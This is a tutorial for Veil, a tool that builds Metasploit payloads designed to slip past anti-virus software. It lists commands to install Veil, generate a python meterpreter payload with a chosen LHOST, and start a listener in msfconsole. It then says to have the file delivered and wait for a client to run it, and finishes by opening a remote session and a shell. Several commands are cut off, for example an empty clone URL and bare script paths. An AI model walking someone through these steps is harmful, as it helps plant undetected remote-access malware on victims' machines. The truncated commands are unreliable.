Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.

Veil Logo


1. Run the commands below and wait for installation to complete

  • sudo apt-get -y install git
  • git clone
  • cd Veil/
  • ./config/ --force --silent

2. Upon completion. You can run the application with the command

  • ./

3. If you ever need to change or update the config you can modify/run the file named /config/ (This will generate the output file for /etc/veil/ Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update)

  • cd config/
  • sudo ./

Using the interface

1. When the application is run, we will get to the main menu where we are shown interested information

  • application version
  • Available tools
  • Available commands

2. list available tools

  • list

3. We can gather information about the available tools

  • info Evasion
  • info Ordnance

4. Show variables and configuration

  • options

5. Select a tool

  • use Evation

6. Now within the module the available commands change for the module. To check a hash against virustotal hashes (not recommended, since virustotal can redistribute the hash to antivirus)

  • checkvt <hash>

7. Listing the available payloads

  • list

8. To check upon the options and variables available within payloads

  • info python/meterpreter/

9. Select a module by number ID

  • use 7

10. Set the payload options, and generate the file, assign a name to the file also

  • set LHOST
  • generate

11. We know the files were stored in the /var/lib/veil/output directory. We need to integrate it with Metasploit

  • msfdb init
  • msfconsole

12. Now import the Metasploit script created by Veil, it will start a listener

  • resource /var/lib/veil/output/handlers/payload.rc

13. Have the file delivered, and, wait for a client to execute it. You will see session log in Metasploit

  • sessions

14. Accessing the current session

  • sessions -i 1
  • sysinfo
  • shell